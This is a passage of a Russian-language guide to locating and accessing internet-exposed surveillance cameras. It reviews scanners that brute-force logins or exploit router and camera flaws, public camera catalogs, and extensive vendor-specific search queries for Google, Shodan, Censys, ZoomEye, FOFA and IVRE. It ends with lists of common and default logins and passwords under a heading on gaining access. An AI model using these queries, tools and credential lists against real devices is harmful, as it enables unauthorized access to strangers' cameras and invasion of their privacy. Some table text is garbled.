рования, анализа и управления компьютерами как в локальной, так и
глобальной сети.
Доступны действия для портов по умолчанию (просмотр HTTP,
FTP, RDP), интеграция с Radmin для удалённого управления.
В качестве аргументов принимает обычные записи IP-адресов, CIDR
и простые диапазоны.
Перед поиском камер рекомендуется поставить опцию «Высокая
точность сканирования» в разделе «Производительность», а также оста-
вить только «HTTP» во вкладке «Ресурсы».
Характеристика ресурса может прямо содержать надпись «IP Camera»
(изобр. 12) или содержать имя производителя, например, AXIS (изобр. 13).
24
http://www.advanced-ip-scanner.com/ru/

24
Изображение 12 — Advanced IP Scanner

Изображение 13 — Advanced IP Scanner

3.3.7. Nesca
Nesca – один из самых известных «элитных» самописных сканеров,
созданный для командной работы по сканированию Сети в поисках

25
различных устройств. Обладает пафосным «хакерским» графическим
интерфейсом (изобр. 14). Часть функционала на данный момент не ре-
ализована, однако, программа позволяет удобно и быстро сканировать
любые диапазоны адресов (обычные и CIDR), а также диапазоны до-
менных имён (DNS-режим, подробнее в do_not_read.txt), задавая при
этом количество потоков, таймаут и проверяемые порты. Найденные
сервисы программа также пытается пробрутить, подбирая логин и па-
роль.

Изображение 14 — Nesca

Распознаёт такие онлайн-камеры как: Hikvision, RVi, Safari CCTV,


AXIS, Linksys, Panasonic, Reecam, Sony, LG Smart IP, GeoVision, Foscam,
EagleEye, Aviosys, WebcamXP, Beward, QCam, Bridge Eyeon и некото-

26
рые другие, умеет подбирать пароли к Hikvision и RVi.
Для сканирования в предыдущих версиях программы требовался
личный ключ, который позволял включиться в сообщество Nesca и
посылать результаты на сервер. В последних версиях для отключения
проверки по ключу можно перейти на вкладку NS-Track и снять галку
Send results to public NescaDatabase.
Доступен старый репозиторий25 исходного кода программы и акту-
альный26 .
Ссылка на скомпилированную под Windows версию 24D87-80127 ,
пароль 24D87-801.

3.3.8. RouterScan
Программа Router Scan была создана на форуме Antichat28 для
поиска и определения роутеров в Сети, а также для извлечения из
них системной информации и получения доступа, но при этом также
определяются и многие DVR/NVR устройства. Получение информа-
ции происходит по двум возможным путям: программа попытается по-
добрать пару логин/пароль к маршрутизатору из списка стандартных
паролей, в результате чего получит доступ, либо попытается исполь-
зовать неразрушающие уязвимости (или баги) для конкретной модели
маршрутизатора (или камер: Netwave, JVC, Siemens, Wificam), поз-
воляющие получить необходимую информацию и/или обойти процесс
авторизации. На основе собранных данных энтузиастами сформирова-
на карта роутеров29 с SSID и паролями.
Последняя доступная версия – 2.60, скачивать рекомендуется с
официального сайта30 , пароль Stas’M Corp. . Исходный код самой
программы закрыт, открыты исходники модулей для эксплуатации уяз-
вимостей.
25
https://bitbucket.org/emopidor/nesca/
26
https://bitbucket.org/cora32/nesca
27
https://mega.nz/#!yZV3UDpY!6D5k-Dd1amF0i_rzIhFM-WU7cdN3pxR2mwsYiIqedtU
28
https://forum.antichat.ru/
29
http://3wifi.stascorp.com/
30
http://stascorp.com/load/1-1-0-56

27
Изображение 15 — Router Scan

3.3.9. Другие инструменты


Из самописных утилит для поиска камер выделяется Verda – гра-
фическая надстройка над Nmap (изобр. 16) (необходим также .Net),
определяющая камеры по шаблонам заголовков и адресов, а также
посылающая запросы на хосты для уточнения информации. Открыт
исходный код на GitHub31 .
Распознаёт такие онлайн-камеры как: Hikvision, NetSurveillance,
DVR Remote Management, Canon, AXIS, Sony, Chipspoint Electronics
(TVT), GeoVision, IVSWeb (VSSWeb), NUUO, Avtech, LvrWeb, XWebPlay,
SuperDVR, Samsung и некоторые другие.
Из минусов следует отметить отсылку программой отчётов о най-
денных результатах на сайт автора32 . Однако, существует версия про-
граммы33 без этой функциональности.
Существуют специализированные утилиты для поиска камер в ло-
кальной сети. Обычно они создаются производителями конкретно для
своих камер. Пример: SADP IP-finder (Search Active Device Protocol)34
– утилита для обнаружения, настройки и сброса пароля устройств
Hikvision (только для локальной сети).
31
https://github.com/sedmoy/verda-v1
32
http://verda-dl.zz.mu/
33
https://github.com/pantyusha/verda-v1
34
http://www.hikvision.msk.ru/index/download/0-14

28
Изображение 16 — Verda

3.4. Онлайн-софт
3.4.1. Онлайн-базы камер
Ниже в таблице приведены ссылки на информационные ресурсы
с базами онлайн-камер. Как правило, доступен и просмотр камеры
онлайн.
Таблица 2 — Базы онлайн-камер
Ссылка Описание
Insecam35 Каталог камер с публичным доступом, категории по
странам и местоположению. Доступно около 25000
камер.
36
EarthCam Популярный сервис для просмотра камер, имеются
возможности расширенного поиска.
37
Camscape Простой сайт-база камер с минимальным описани-
ем и категоризацией по географическому положению.
Доступно около 1400 камер.
Продолжение на следующей странице

35
http://www.insecam.org/
36
http://www.earthcam.com/
37
http://www.camscape.com/

29
Таблица 2 – Продолжение
Ссылка Описание
AtenLabs Сборник камер с тривиальным интерфейсом для их
hhhh ( ( (
( ( ( hh
XXX 38
Camwar
 XX X переключения, большая часть базы недействительна.
В данный момент недоступен, сохранён в архиве39 .
goandroam40 Простой сервис просмотра камер с возможностью
комментирования для зарегистрированных пользова-
телей. Доступна возможность поиска камер по гео-
графическому положению/близости.
hhhh((((
World
( (( h( Wide
hhh Простой сервис с базой адресов камер с географи-
41
Livecams ческой информацией и сохранёнными скриншотами.
hhhh ( ( (
( (( hh
Доступно около 1300 камер. В данный момент недо-
ступен, сохранён в архиве42 .
AMOS (the Научный проект по сбору и исследованию изображе-
archive of ний камер по всему миру. Доступна история снимков
many outdoor и их архивы, географическая информация и теги, од-
scenes)43 нако, прямых трансляций нет.
ip Cams Сайт производителя одноимённого софта с трансля-
44
Live циями в различных форматах. Доступно около 600
камер.
45
mjpeg.net Сервис для хранения камер со скриншотами и описа-
XXX 
X X
 X
X
нием, есть возможность определения географическо-
го положения и ближайших камер. Заброшен с 2010
года. Доступно около 6000 камер. В данный момент
недоступен, сохранён в архиве46 .
tvway.ru47 Русскоязычный каталог камер в разных точках мира,
есть теги по географическому положению и открыва-
ющимся видам.
48
TV Joy Русскоязычный каталог камер в разных точках мира,
есть категоризация по открывающимся видам. Забро-
шен с 2014 года.
Продолжение на следующей странице

38
http://www.atenlabs.com/camwar/index.php
39
http://web.archive.org/web/*/http://www.atenlabs.com/camwar/index.php
40
http://www.goandroam.com/
41
http://camelive.info/
42
http://web.archive.org/web/*/www.mjpeg.net
43
http://amosweb.cse.wustl.edu/
44
http://www.ipcams.ch/
45
http://www.mjpeg.net/
46
http://web.archive.org/web/*/camelive.info/
47
http://tvway.ru/
48
http://tvjoy.ru/

30
Таблица 2 – Продолжение
Ссылка Описание
49
webcamplaza Проработанный каталог камер с различными катего-
риями
50
IP24 Удобный каталог камер с категоризацией, определе-
нием модели камеры, местоположения и погоды в ме-
сте размещения камеры. База активно пополняется.
Доступно около 5000 камер.

3.4.2. Google Search


Процесс поиска в Google достаточно тривиален (необходимо лишь
напомнить, что при частых запросах появляется капча). Приведённые
ниже шаблоны поиска (dorks) также могут быть использованы в лю-
бой другой индексирующей системе в соответствующей для неё нота-
ции или для ручного поиска при наличии заголовков/текстов страниц
(полученных с помощью софта).
Разумеется, нижеуказанные шаблоны не исчерпывают все возмож-
ные камеры – они лишь отражают наиболее часто искомые и до-
ступные в данное время (актуально на 12.2015). При желании можно
провести анализ рынка онлайн-камер, выявив новые/приобретающие
популярность, а затем, пользуясь справочниками ссылок (см. раздел
Онлайн-базы камер) и другими материалами (возможно, руководства-
ми по конкретной модели или демо-камерами), подобрать шаблон, не
используемый никем ранее, что гарантирует более высокую вероят-
ность нахождения не попадавшихся другим камер.
Операторы поиска
intitle: – поиск подстроки в заголовке страницы (тег <title>);
inurl: – поиск подстроки в адресе страницы (URL, путь);
intext: – поиск подстроки в тексте страницы (видимая часть);
all – префикс, ставится перед указанными выше выражениями,
после этого поиск будет производиться по каждой подстроке;
" (двойные кавычки) – означают поиск по целому выражению,
если оно состоит из нескольких подстрок; подстроку без пробелов нет
смысла окружать кавычками;
- (минус) – ставится перед указанными выше модификаторами
запроса, инвертирует результат (показывает страницы, НЕ содержащие
подстроки).
Примеры использования
49
http://www.webcamplaza.net/
50
http://ip-24.net/

31
Изображение 17 — Поиск в Google по части URL

Active WebСam Page


"Active WebСam Page"

AXIS
inurl:axis-cgi
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg
inurl:axis-cgi/mjpg/video.swf
inurl:mjpg/video.mjpg
inurl:mjpg/video.cgi
inurl:video.cgi?resolution=
inurl:indexFrame.shtml "AXIS Video Server"
inurl:view/view.shtml AXIS
inurl:view/index.shtml
inurl:view/indexFrame.shtml
"Live web imaging unleashed"
intitle:"Live View / - AXIS <модель>"
inurl:axiscam.net AXIS
inurl:axiscam.net intitle:Camera
inurl:axiscam.net "Live view"
inurl:dyndns.org AXIS
"Live View is the default page"

32
inurl:view/ctl.shtml
inurl:netw_tcp.shtml
inurl:/mpeg4/video.sdp
inurl:cgi-bin/push.html
inurl:"axis-cgi/motion/motiondata.cgi"
intitle:axis intitle:"video server"

Biromsoft
intitle:"Biromsoft WebCam" -4.0 -serial -ask -crack -software -a -the
-build -download -v4 -3.01 -numrange:1-10000

Canon
inurl:lvappl
inurl:sample/LvAppl
intitle:liveapplet inurl:LvAppl
inurl:sample/Others/SvrPush.htm
inurl:viewer/live/en/live.html

Cisco (Linksys)
inurl:"/main.cgi?next_file=index.htm"
camera linksys inurl:main.cgi
intitle:"Linksys Web Camera" "ver"
inurl:/img/vr.htm

Convision
inurl:pictype=jpegserverpush

D-Link
inurl:"top.htm?Currenttime"

EvoCam
intitle:EvoCam inurl:webcam.html

FlexWATCH
inurl:viewash.html
inurl:/app/idxas.html
inurl:/app/sample/ab1.asp
intitle:flexwatch intext:"Home page ver"

i-Catcher
intitle:"i-Catcher Console - Web Monitor"
intitle:"i-Catcher Console - Web Playback"

33
INTELLINET
intitle:"::::: INTELLINET IP Camera Homepage :::::"
inurl:/main_activex.asp
inurl:/main_applet.asp

IQeye
intitle:"IQeye302 |IQeye303 |IQeye601 |IQeye602 |IQeye603"
intitle:"Live Images"
inurl:"appletvid.html"

MOBOTIX
inurl:cgi-bin/guestimage.html
inurl:control/userimage.html
intext:"MOBOTIX" inurl:"userimage.html"
"Kamerainformationen anzeigen"
(intitle:MOBOTIX intitle:PDAS) | (intitle:MOBOTIX intitle:Seiten) |
(inurl:/pda/index.html +camera)
inurl:dyndns.org MOBOTIX

NetCam
liveapplet
intitle:"netcam live image"
Configuration "Pop-up Live Image"
Display Cameras intitle:"Express6 Live Image"

NuSpectra
inurl:snap.html +intitle:"SiteCam"
intitle:"SiteCam Video Snapshot"

Panasonic
inurl:/cam_portal.cgi
"ViewerFrame?Mode="
inurl:ViewerFrame?Mode=Motion
-inurl:htm -inurl:html inurl:ViewerFrame
inurl:MultiCameraFrame?Mode=
inurl:MultiCameraFrame?Mode=Motion
site:.viewnetcam.com -www.viewnetcam.com
allintitle:Network Camera NetworkCamera
inurl:portal_main.html intitle:Panasonic
inurl:CgiStart intitle:Camera
intitle:"WJ-NT104 Main"
inurl:".viewnetcam.com"

34
QuickCam
intitle:"QuickCamPro WebCam"inurl:webcam

Sony
inurl:home/homeJ.html
intitle:snc-rz30
intitle:snc-cs3 inurl:home/
intitle:"sony network camera snc-p1"

SupervisionCam
intitle:"supervisioncam protocol"

TOSHIBA
"TOSHIBA Network Camera - User Login"
intitle:toshiba inurl:user_single_view.htm
inurl:/user_view_M.htm

VisionGS
intitle:"VisionGS Webcam Software"

webcamXP
"Powered by webcamXP"
intitle:my webcamXP server!
"powered by webcamXP" "Pro|Broadcast"
inurl:"pocketpc?camnum=1"

WebGate
"Webthru User Login"

Другое
"Live video"
-inurl:htm -inurl:html inurl:webcam.php
inurl:Remote/index.php3
inurl:/Aview.htm
inurl:chconv?CH=
inurl:Ctl/index.htm?Cus
intitle:"SiteZAP WebCam Control"
inurl:webcam.asp
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:dyndns intitle:Network Camera
inurl:toolam.html
inurl:Camera.aspx?ServerID

35
inurl:next_file=main_fs.htm

3.4.3. Shodan

Shodan51 – сервис для поиска различных устройств, подключённых


к Сети. Запущен в 2009 году. Для получения результатов больше двух
страниц требуется оплата.
По состоянию на 2017 год, запросы для поиска онлайн-камер явля-
ются наиболее популярными в поисковике.
Одним из преимуществ Shodan перед Google является возможность
поиска по заголовкам ответа, т.е. данным сервера, авторизационного
запроса, специфичных служебных данных. Таким образом, становит-
ся легко отсеять устройства, использующие специфичные сервера для
видеотрансляции.
Другим из преимуществ является возможность поиска с фильтрами
(указание нестандартного порта, страны, города).
Стоит также отметить удобную возможность расшаривания сво-
их вопросов и назначения на них тегов. Так, всегда можно посмот-
реть новые шаблоны поиска онлайн-камер по тегам: webcam52 , cam53 ,
camera54 , cctv55 , dvr56 .
Есть официальные библиотеки для работы через Ruby, Python, Perl,
.NET
Операторы поиска
Поисковые фильтры, в терминологии Shodan, – это специальные
ключевые слова для поиска в метаданных ответа.
has_screenshot:true – фильтр для поиска результата со скрин-
шотами (применителен не только к камерам, также к VNC, RTSP, X
Windows, для поиска только камер со скриншотами можно указать
протокол http);
port – указание проиндексированного порта устройства;
city – указание города;
country – указание двухбуквенного кода страны;
title – поиск в заголовке страницы;
html – поиск в HTML-ответе сервера;
51
https://shodan.io
52
https://www.shodan.io/explore/tag/webcam
53
https://www.shodan.io/explore/tag/cam
54
https://www.shodan.io/explore/tag/camera
55
https://www.shodan.io/explore/tag/cctv
56
https://www.shodan.io/explore/tag/dvr

36
" (двойные кавычки) – означают поиск по целому выражению,
если оно состоит из нескольких подстрок; подстроку без пробелов нет
смысла окружать кавычками;
- (минус) – ставится перед фильтрами или строками, исключая их
из результата.
Примеры использования

Изображение 18 — Поиск в Shodan по хэшу favicon

Любое проиндексированное устройство, имеющее скриншот на


веб-интерфейсе
has_screenshot:true http

AXIS
axis camera
Content-Length: 695
product:"Axis 207W Network Camera ftpd"

Blue Iris
http.favicon.hash:-520888198

37
Bosch
Server: VCS-VideoJet-Webserver

Brickcom
Brickcom

Canon
Server: VB
Server: VB100
Server: VB150

Cisco
title:’+tm01+’
title:"WVC210 Wireless-G PTZ Internet Camera with Audio"

Devline
title:"Devline" http.favicon.hash:-1238307632

D-Link
title:"DCS-5300G" Server: D-Link Internet Camera
D-Link Internet Camera, 200 OK
title:"DCS" title:"IP camera"

Hikvision
hikvision Content-Length: 1341
http.favicon.hash:999357577

Hipcam
Server: Hipcam RealServer/V1.0

i-Catcher
Server: i-Catcher Console

Lorex
LNE3003 Wireless IP Camera

MayGion
maygion
IPCamera_Logo

MJPG Streamer
title:"MJPG-Streamer"

38
NetBotz Network Monitor
title:"netbotz appliance"

Netwave
Netwave IP Camera

Panasonic
Server: U S Software Web

Pelco Sarix
title:"Sarix&trade;"
http.favicon.hash:-1493733992

P2P Network Camera


wificam

Samsung
title:"Web Viewer for Samsung DVR" Content-Length: 2524

Sony
Server: NetEVI

StarDor NetCam XL
title:"NetCamXL"
http.favicon.hash:350327796

TP-LINK
title:"IP CAMERA Viewer"Content-Length: 703

TRENDnet
Auther: Steven Wu

Ubiquiti
Server: UBNT Streaming Server v1.2

Vivotek
Vivotek Network Camera -401

VMAX Web Viewer


title:"Login cgicc form"

webcamXP/webcam7
webcamXP country:RU

39
webcam 7

Yawcam
yawcam
product:"Yawcam webcam viewer httpd"
http.favicon.hash:-409277045

Другое
Basic realm="DVR" server: httpd -mini
Server: SQ-WEBCAM
"webcam" "last-modified"
Android Webcam Server -Authenticate
Boa ipcam
imagiatek ipcam
ADH-web
AbelCam
charset=%s

3.4.4. Censys
Censys57 – открытый проект сбора информации о сетевых узлах во
всей Сети, запущенный в 2015 году после презентации на 22-й кон-
ференции по безопасности компьютеров и коммуникаций (ACM CCS).
Сканирование осуществляется с помощью инструмента сканирования
ZMap, поддержка других возможностей осуществляется при помощи
ZGrab, ZDb и ZTag.
Поддержка Censys осуществляется учёными из Мичиганского и
Иллинойсского университетов. Фактически, поиск проходит на базе
мощностей Google; ежедневно сканируется вся Сеть, а огромное коли-
чество информации по результатам предоставляется всем желающим
исследователям безопасности. При этом организаторы сканирования
всегда оставляют возможность исключить ваши IP из объектов ска-
нирования и предоставляют информацию о том, кто и зачем это осу-
ществляет, на 80 и 8080 портах сканирующих адресов (изобр. 19).
Сейчас для коммерческих пользователей доступны тарифы Basic и
Pro по 99 и 999 долларов соответственно, с расширенными возможно-
стями для доступа к поиску через Web и API; также существует тариф
Enterprise, позволяющий работать напрямую с базой, историческими
данными и выполнять сложные запросы.
Из минусов имеет смысл отметить индексацию и поиск только по
типичным для сервисов портам: можно задать подробные параметры
для 80 порта, но для 81 данных не будет. Также отмечено, что при
57
https://censys.io/

40
поиске без указания фильтра в результатах не подсвечивается часть
баннера, по которой произошло сопоставление, что бывает неудобно;
при поиске по составным запросам без кавычек выдаётся много ре-
зультатов, но релевантны только первые несколько, что вводит в за-
блуждение.

Изображение 19 — Типичная страница Censys на сканирующем IP-


адресе

Примеры использования
Ниже приведены примеры запросов, которые можно вводить в веб-
интерфейсе в поле поиска (см. изобр. 20).

41
Изображение 20 — Поиск в Censys по тегу camera

Устройства, определённые как онлайн-камеры


tags: camera
tags.raw: camera and location.country_code: RU
metadata.descrtiption: camera
metadata.device_type: camera
80.http.get.metadata.product: webcam
8080.http.get.metadata.product: webcam

AXIS
metadata.manufacturer: Axis
21.ftp.banner.banner: axis

EverFocus
23.telnet.banner.banner: "everfocus login:"

FLIR
80.http.get.title:"FLIR Systems, Inc."
8080.http.get.title:"FLIR Systems, Inc."

42
Foscam
HiIpcam
(Foscam) AND protocols.raw: "8080/http"

Hikvision
metadata.description: "Hikvision Camera"

Ivideon
Ivideon
8080.http.get.metadata.product: IVIDEON

Megapixel
80.http.get.headers.server: "HKVision-Webs"
80.http.get.headers.server: "Cam-Webs"
80.http.get.metadata.description: "HankVision Webs"
80.http.get.headers.www_authenticate: Basic realm="Megapixel_IP_Camera"
"Hankvision Webs"

TRENDnet
"Steven Wu"
80.http.get.headers.www_authenticate: "Basic realm=\"Netcam\""
80.http.get.headers.www_authenticate: "Basic realm=\"TV-IP551W\""
8080.http.get.headers.www_authenticate: "Basic realm=\"TV-IP551W\""

Sony
NetEVI
80.http.get.metadata.product: NetEVI

Разное
80.http.get.headers.server: "MJPG-Streamer/0.2"
80.http.get.headers.server: Basic realm="AtBrain Camera-Streaming"

3.4.5. ZoomEye
ZoomEye58 – китайский сервис для поиска различных устройств,
созданный компанией Knownsec Inc в 2013 году. Доступен официаль-
ный SDK59 . Для поиска необходима регистрация.
Так же, как и Shodan, позволяет фильтровать результаты и ис-
кать по определённым параметрам (сервис/софт, операционная систе-
58
https://www.zoomeye.org
59
https://github.com/ZoomEye/SDK

43
ма, геолокация, параметры адресации).
В настоящее время ZoomEye содержит данные примерно о 400
миллионах устройств, из которых к 823850 определены как webcam и
112686 определены как media device.
В настоящее время для зарегистрированных, но не подтвердивших
через телефон свой ID пользователей, не отображается последний ок-
тет в найденных IP-адресах и не выводится информация о баннере.
Операторы поиска
device - тип устройства (список на 09.01.201760 ), для поиска камер
в ZoomEye есть значение фильтра device – webcam;
app – внутреннее название сервиса;
port – указание проиндексированного порта устройства;
cidr – поиск в указанном CIDR-сегменте сети;
" (двойные кавычки) – означают поиск по целому выражению,
если оно состоит из нескольких подстрок; подстроку без пробелов нет
смысла окружать кавычками.
Примеры использования

Изображение 21 — Поиск в ZoomEYE по фильтру камер

Онлайн-камеры (все производители)


60
http://pastebin.com/aQgS0zVe

44
device:webcam
app:webcam

ACTi
"RPreview.htm"
app:"ACTi E32 camera control server port"
app:"ACTi E31 surveillance camera http config"
app:"ACTi NVR3 surveillance camera http config"
app:"ACTi ACM-1231 surveillance camera http config"
app:"ACTi surveillance camera http config"
app:"ACTi surveillance camera rtspd"
app:"ACTi E32 webcam rtspd"
app:"ACTi webcam httpd"

American Dynamics
"American Dynamics"
app:"American Dynamics EDVR security recorder"
app:"American Dynamics Intellex Digital Video Management System
httpd"

Avtech
loginDevice.js
app:"Avtech AVN801 network camera"
app:"AVTECH webcam httpd"
app:"Avtech MPEG4 DVR control rtspd"
app:"Avtech IP camera httpd"

Bosch
VCS-VideoJet-Webserver
app:"Bosch webcam httpd"
app:"Bosch Security DVR httpd"

Brickcom
Brickcom

Cisco
app:"Cisco WVC54GCA webcam rtspd"

Chipspoint Electronics (TVT)


app:"Cross DVR httpd"
title:"DVR Components Download"
headers:"Server:Cross Web Server"

45
D-Link
app:"D-Link DCS-5010L_56 webcam http interface"

Devline
app:"Devline Line surveillance system httpd"
"hideCamerasMenu"

DVSS Herculese
app:"DVSS Herculese DVR http config"
server:DVSS

FLIR
flirKeepCon

Foscam
app:"foscam httpd"
headers:"Server: ReeCam IP Camera"

GeoVision
GeoHttpServer

HCMSActiveX Viewer
"http://www.eznetdns.com/HCMSActiveX/"

Hikvision
Hikvision-Webs
app:"Hikvision IP camera httpd"
app:"Hikvision DVR httpd"
http://DVRDVS

Microdigital
app:"MicroDigital MDR-4600 DVR httpd"

JVC
app:"JVC VR-800-series DVR admin httpd"
app:"JVC V.Networks video httpd"

MayGion
app:"Maygion IPCamera http interface"

PY Software Active WebCam


app:"PY Software Active webcam httpd"

46
TRENDnet
app:"D-Link/Airlink IP webcam http config"
app:"TRENDnet TV-IP110W webcam display httpd"
Auther Steven Wu

Другое
"Android Webcam Server"
app:"GM Streaming Server httpd"
app:"Hipcam IP camera rtspd"

3.4.6. FOFA

FOFA61 – китайский поисковой движок, запущенный компанией


BAIMAOHUI в 2015 году. Доступны исходники версии 262 поисковика
(сейчас используется версия 3) и официальный SDK63 на Go, C и
Python.
Аналогично ZoomEye, FOFA делит результаты на две категории:
сайты и сервисы. На текущий момент собраны данные примерно о 483
миллиона устройств и 375 миллионов сайтов.
Операторы поиска
app – внутреннее название сервиса FOFA, неполный список раз-
битых по категориям сервисов доступен на странице library64 ;
header – поиск по заголовкам HTTP-ответа;
body – поиск по телу HTTP-ответа;
title – поиск по заголовку HTML;
banner – поиск по баннеру (заголовки HTTP, FTP, SMTP и дру-
гое);
" (двойные кавычки) – означают поиск по целому выражению,
если оно состоит из нескольких подстрок; подстроку без пробелов нет
смысла окружать кавычками.
== – строгий поиск по строке.
Примеры использования
Ниже приведены примеры запросов, которые можно вводить в веб-
интерфейсе в поле поиска (см. изобр. 22).
61
https://fofa.so
62
https://github.com/LubyRuffy/fofa
63
https://github.com/fofapro
64
https://fofa.so/library

47
Изображение 22 — Поиск в FOFA по фильтру камер

ACTi
app="ACTi" && server=="Httpd v1.0 05may2008"
ACTi网络摄像机

ActiveCam
"ActiveCam"
server=="Brovotech/2.0.0"

Amcrest
body="onclick=\"chkAlarmSound()\"/> <label id"
app="amcrest_camera"

Avidis Spotter
header:"Indy/10.1.5" && title:spotter

Avreg
avreg

Brickcom
header="Brickcom CB-302Ap"
app="Brickcom-CB-101Ap"

48
app="Brickcom-CB-302Ap"

Dahua-DSS
app="Dahua-DSS"

DynaColor
body="dynacolor\")) EShow(\"osdCmdTb"
app="DynaColor摄像头"

Foscam
"WebInit(DownPluginTip"
app="ReeCam"

Hikvision
app="海康威视-iVMS"

Honeywell
app="Honeywell-IP-Camera"
"Checking HNVR Client Control Version"

JVC
header="Server: Camera Www-Authenticate"

Linksys
body="href=\"adm/file.cgi?next_file=basic.htm\" class=\"menubar"
app="Linksys-IP-Cameras"
app="Linksys-Wireless-G-Camera"

Milestone XProtect Web Client


"tmpl_disabledCamerasToggleElement"

NetDvrV3
body="objLvrForNoIE"
app="NetDvrV3"

NetcamStudio
"camera_0.initCamera"

NetSurveillance
app="NETSurveillance"
title="NETSurveillance WEB"

SecurOS

49
"&copy; 2005&ndash;2011 " && "ISS"
"res[23] = ’Opening monitor...’;"

Siemens
"Www-Authenticate: Basic realm=\"Compact Siemens WiFi Camera\""
app="Siemens-IP-Cameras"

StarDot
body="applet code=\"CaptureClient.class"
app="StarDot"
app="StarDot-NetCam"

TRENDnet
header="netcam"
app="Trendnet-IP-Cam"

VideoIQ
title=="VideoIQ Camera Login"
app="VideoIQ-Camera"

VSSWeb
app="VSS-Web"
header="WCY_WEBServer"

ZoneMinder
body="<h1>ZoneMinder Login</h1>"
app="ZoneMinder"

Другое
"Basic realm="Network Camera""
banner=Camera
app="DVR设备"
app="DVR-Camera"
"meta name=\"generator\" content=\"WebGateInc\""
app="WebEye-Network-Camera"
app="PLANET-IC-Login"
app="Vigil-DVR"
app="Beward摄像头"
"Basic realm=index.html"

50
3.4.7. IVRE

IVRE65 – открытая66 система для распределённого сканирования


Сети. В отличие от Shodan и Censys, создатели сделали акцент на
практическом применении для частных исследователей: система нетре-
бовательная и может быть развёрнута на локальной машине, также
доступны интеграции с самыми разными сканерами.
Безусловное преимущество IVRE состоит в возможности одновре-
менной фильтрации по большому количеству параметров (в том числе
по результатам скриптов Nmap), при этом можно выводить только са-
мую необходимую информацию.
Система состоит из трёх базовых частей: база данных, web-сервер
и клиент. Клиент является сборкой необходимых модифицированных
инструментов и упрощает сканирование сети. Например, запустить
полную проверку Nmap по IP-адресам в файле ips.txt можно ни-
жеследующей командой:
ivre runscans --file ips.txt --output=XMLFork
После запуска в текущей директории появятся скриншоты и XML-
файлы с данными сканирования. Импортировать их в базу данных
можно вручную через web-интерфейс, раздел Upload, либо через ко-
манду:
ivre scan2db -c Manual -s Insecam -r scans/
В IVRE присутствует разбиение результатов по источнику и кате-
гории сканирования. Логично, например, указывать источник данных
при загрузке (поисковую систему, сайт и т.п.) и способ получения ре-
зультатов (точечное сканирование, массовое, случайное).
В дальнейшем по базе данных и её выборкам, полученным при
фильтрации, можно на лету строить географические карты, диаграммы
распределения по времени, адресам и портам. Собственная база из
информации, собранной по адресам с помощью выполнения различных
скриптов Nmap, может быть чрезвычайно полезна при составлении
дорков.
Примеры использования
Ниже приведены примеры запросов, которые можно вводить в веб-
интерфейсе в полях блока Filter (см. изобр. 23).
65
https://ivre.rocks/
66
https://github.com/cea-sec/ivre

51
Изображение 23 — Поиск в IVRE по фильтру камер GeoVision

Любые камеры
httptitle:/Camera/i
script:http-headers:/Camera/i
devicetype:webcam
geovision

ActiveCam
script:http-server-header:/Brovotech/

Amcrest
script:fingerprint-strings:/@WebVersion@/

Avigilon
script:http-title:/"Avigilon Camera Login"/

D-Link
script:http-auth:"/Basic realm=DCS-5009L/"

Hikvision
script:http-favicon:/89B932FCC47CF4CA3FAADB0CFDEF89CF/
script:http-auth-finder:/login.asp/
script:http-server-header:DNVRS-Webs

52
Honeywell
httptitle:"HNVR Client"
script:fingerprint-strings:"/Server: VideoServer/"

Milestone XProtect Web Client


script:http-server-header:Microsoft-HTTPAPI/2.0 httptitle:/"Web Client"

Reolink
httptitle:Reolink
script:http-favicon:/05F620252F7E1156DDA8F222CE574C5A/

VideoEdge
script:http-title:/VideoEdge/
script:http-favicon:/153B150C0F8A39FD26BC8BC4AAC70E06/

Vstarcam
script:http-auth:/realm=Vstarcam/

Y-cam
script:fingerprint-strings:/Y-CAM:BULLET/

Другое
script:http-auth:/NVR/
httptitle:/NVR/i
script:fingerprint-strings:/TV-IP551W/
script:fingerprint-strings:/TV-IP\d+W/
script:http-title:"/DVR Web Client/"

3.4.8. Другие инструменты


Существуют также упрощённые альтернативы приведённым выше
серверным системам. Они не требуют больших мощностей и могут
быть развернуты на локальном или частном удалённом сервере для
использования в качестве удобного хранилища данных по IP-адресам.
MASSCAN Web UI67 – открытая система с веб-интерфейсом для
хранения данных сканирования из Masscan в базе данных MySQL,
написана на PHP.
Scanlab68 – открытая система с веб-интерфейсом для сбора и про-
смотра данных сканирования из Nmap в базе данных MongoDB, на-
67
https://github.com/offensive-security/masscan-web-ui
68
https://github.com/digital-ghost/scanlab

53
писана на PHP.

54
4. Получение доступа
4.1. Логины и пароли
4.1.1. Онлайн-базы логинов, паролей и URL
Ниже в таблице приведены ссылки на информационные ресурсы по
моделям камер и доступу к ним.
Таблица 3 — Онлайн-базы реквизитов камер
Ссылка Описание
CAMURL.RU69 Справочник ссылок доступа для камер по произ-
водителю и модели
ISPYCONNECT70 Справочник ссылок доступа для камер по модели
Art-Of-War71 Список паролей по умолчанию для оборудования
от различных производителей
(72
zee:cure
hhh
(((( h(
hh Пароли по умолчанию и дефолтные IP для раз-
ных типов камер. В данный момент недоступен,
сохранён в архиве73
RTSP-STREAM74 Справочник типов и адресов доступа к видеопо-
токам камер

4.1.2. Статистика
В следующих колонках отражены наиболее часто используемые для
сетевых устройств логины и пароли75 . Удобные для использования в
инструментах списки популярных паролей открыты и доступны на мно-
гих ресурсах76 .

69
http://www.camurl.ru/
70
https://www.ispyconnect.com/sources.aspx
71
http://art-of-war.ru/0500-it/0600-hardware/passwords
72
http://zeecure.com/free-cctv-and-security-tools/complete-list-of-every-ip-camera-default-username-
password-and-ip-address/
73
http://archive.is/UBQIH
74
http://rtsp-stream.ru
75
По данным Nesca, 12.2015
76
https://github.com/danielmiessler/SecLists/tree/master/Passwords

55
Логины:

admin test telecom


root ftp dreambox
123123 1234 master
123456 administrator Admin
12345 qwerty guest
cisco recovery backup
super Polycom cgadmin
meinsm system 0000
monitor naadmin 1111

Пароли:

root test 0000


admin sysadm 000000
password admin123 master
123456 Admin 12345678
1234 123321 666666
12345 12344321 123123123
ADMIN toor 123454321
cisco qwerty123 0123456789
ftp 1q2w3e4r qqqqqq
ROOT 987654321 administrator
123123 system sys
pass telecom guest
passwd dreambox backup
qwerty 111111 fujiyama
meinsm 1111 super
monitor 654321 P@ssw0rd
user !@#$%ˆ passw0rd

56
4.1.3. Логины и пароли по умолчанию
В следующей таблице отражены дефолтные (по умолчанию) ло-
гины/пароли для доступа к некоторым видам камер. Внешний вид
веб-страниц камер разных производителей можно изучить в подразде-
лах Идентификация камер, Форматы трансляции, Браузерные плаги-
ны, Софт для видеотрансляций.
